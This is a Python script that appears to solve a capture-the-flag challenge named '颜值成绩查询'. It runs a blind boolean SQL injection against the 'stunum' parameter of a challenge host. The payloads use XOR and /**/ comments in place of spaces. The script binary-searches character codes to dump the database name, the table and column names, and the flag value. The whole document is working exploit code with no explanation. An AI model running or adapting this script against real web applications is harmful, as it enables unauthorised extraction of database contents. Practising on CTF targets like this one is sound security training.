颜值成绩查询

import requests

if __name__ == "__main__":
    result = ""
    i = 0
    while True:
        i = i + 1
        head = 32
        tail = 127

        while head < tail:
            mid = (head + tail) >> 1
            # sql = "select(database())"
            # sql = "select/**/group_concat(distinct/**/TABLE_NAME)from(information_schema.tables)where(table_schema='ctf')"
            # sql = "select/**/group_concat(distinct/**/COLUMN_NAME)from(information_schema.columns)where(table_schema='ctf')and(table_name='flag')"
            sql = "select/**/group_concat(value)from(ctf.flag)"
            payload = "1^(ascii(substr((%s),%d,1))>%d)^1" % (sql, i, mid)
            url = "http://14753567-1903-42c7-ba3e-0e698232711b.node3.buuoj.cn/?stunum=" + payload
            response = requests.get(url=url)
            # print(url)
            # print(response.text)

            if "Hi admin, your score is: 100" in response.text:
                head = mid + 1
            else:
                tail = mid

        if head != 32:
            result += chr(head)
        else:
            break
        print(result)